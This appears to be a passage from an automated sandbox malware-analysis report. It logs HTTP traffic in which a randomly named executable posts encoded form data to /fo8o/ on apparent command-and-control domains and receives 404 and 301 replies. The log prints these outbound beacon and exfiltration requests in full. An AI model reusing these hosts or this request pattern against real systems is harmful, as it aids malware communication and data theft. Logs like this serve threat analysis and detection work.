                                                                                    Data Ascii: Ubhdm=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCiS0ZzIVTXvKZ7mVcccYSDRL+9JMDZ/HygKbKbeE=
                                                                                    Jan 8, 2025 15:02:02.765703917 CET367INHTTP/1.1 404 Not Found
                                                                                    Date: Wed, 08 Jan 2025 14:02:02 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.549994195.110.124.133803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:02:04.643358946 CET821OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Origin: http://www.elettrosistemista.zip
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 6e 47 74 61 45 30 49 50 6d 62 36 70 4c 36 46 4a 51 39 6c 62 6e 74 6f 38 6a 36 61 62 54 45 79 6f 71 74 6e 42 52 77
                                                                                    Data Ascii: Ubhdm=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxnGtaE0IPmb6pL6FJQ9lbnto8j6abTEyoqtnBRw
                                                                                    Jan 8, 2025 15:02:05.370394945 CET367INHTTP/1.1 404 Not Found
                                                                                    Date: Wed, 08 Jan 2025 14:02:05 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.2.549995195.110.124.133803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:02:07.179446936 CET1838OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Origin: http://www.elettrosistemista.zip
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4e 51 6d 4a 43 66 2f 72 36 30 52 65 49 71 72 39 59 76 57 4b 61 34 34 35 6f 6a 44 76 49 4c 39 54 6f 4b 68 7a 2b 48 2b 32 33 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 4f 32 53 7a 58 78 48 55 52 70 76 65 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 [TRUNCATED]
                                                                                    Data Ascii: Ubhdm=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWNQmJCf/r60ReIqr9YvWKa445ojDvIL9ToKhz+H+23Z5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EO2SzXxHURpveCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adMKOJWb586q0++bqb0hnKbeHTSSOaeXEfwuVRmO72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQ4K9J+v++n+MLZPtINn7STocl2A3Ct0TVuxuY+wgnsJMFRG6tA1RxuVLLvV1AnZhNx1HNnssc7WE/yLrcWMbUzBHXPc1kNCaBFFnx1U97uOS5kDZbbXMP2pDR6ux3gwd0AagBpgRl442rnmHx75cXU3eHxJswxungZDTNQUv505kKZxzw80dtlHOLk/pB/gRWWcZyZbk4ZdNQgs0BmrEzW8TVxt2k82jaSmoGnYjN9XoLQoV1V3MLEI+nuki6gSo2cPk1fxAh9p0o2ralwtZD0t//uTMCXDbrg8fVhD0Ly282XddZXUlAbrcOnA4Vo3SKxFUIZP/22/L8OhkvlybwgHCNEEkxzqhuyeOjkETJOhlPkmzcj/nIXmJCv/eM4YwZqaqLiZRh9WHtxfMi1fKrPdWm4edZPAx0FNzhKyMjvpHto3OeOWNpYDhPl3lVs0qQ1YNP/3AFuKWVkfqkP8N6s1Tl+CTchdpVnnfFygV02iAEx8s/ZD01jKVKesA0Wv8lObFdlA1utCJQSEc [TRUNCATED]
                                                                                    Jan 8, 2025 15:02:07.852940083 CET367INHTTP/1.1 404 Not Found
                                                                                    Date: Wed, 08 Jan 2025 14:02:07 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.2.549996195.110.124.133803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:02:09.706173897 CET522OUTGET /fo8o/?Dvh=YnI07v&Ubhdm=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 8, 2025 15:02:10.386743069 CET367INHTTP/1.1 404 Not Found
                                                                                    Date: Wed, 08 Jan 2025 14:02:10 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.2.549997217.196.55.202803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:02:31.965532064 CET789OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.empowermedeco.com
                                                                                    Origin: http://www.empowermedeco.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 4d 30 71 68 75 2f 53 71 4b 4c 44 43 47 38 4e 50 79 48 34 57 42 74 34 68 7a 43 79 55 71 71 52 6a 37 71 63 30 57 30 3d
                                                                                    Data Ascii: Ubhdm=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuM0qhu/SqKLDCG8NPyH4WBt4hzCyUqqRj7qc0W0=
                                                                                    Jan 8, 2025 15:02:32.541184902 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    content-length: 795
                                                                                    date: Wed, 08 Jan 2025 14:02:32 GMT
                                                                                    server: LiteSpeed
                                                                                    location: https://www.empowermedeco.com/fo8o/
                                                                                    platform: hostinger
                                                                                    panel: hpanel
                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.2.549998217.196.55.202803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:02:34.503525972 CET809OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.empowermedeco.com
                                                                                    Origin: http://www.empowermedeco.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 42 41 78 67 4b 46 46 61 4c 34 35 59 36 73 71 42 6a 43 35 30 6a 4c 41 61 59 62 59 48 4c 72 6a 6c 56 48 6b 36 30 65
                                                                                    Data Ascii: Ubhdm=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhBAxgKFFaL45Y6sqBjC50jLAaYbYHLrjlVHk60e
                                                                                    Jan 8, 2025 15:02:35.059575081 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    content-length: 795
                                                                                    date: Wed, 08 Jan 2025 14:02:34 GMT
                                                                                    server: LiteSpeed
                                                                                    location: https://www.empowermedeco.com/fo8o/
                                                                                    platform: hostinger
                                                                                    panel: hpanel
                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.2.549999217.196.55.202803200C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 8, 2025 15:02:37.037743092 CET1826OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.empowermedeco.com
                                                                                    Origin: http://www.empowermedeco.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 7a 66 57 5a 6e 4e 6e 31 33 44 6b 46 66 7a 44 2f 49 65 45 6e 42 33 32 7a 51 2f 57 4b 65 45 72 65 54 79 34 78 6b 73 63 6f 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 30 4f 5a 6e 37 68 75 35 4b 34 66 37 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 [TRUNCATED]
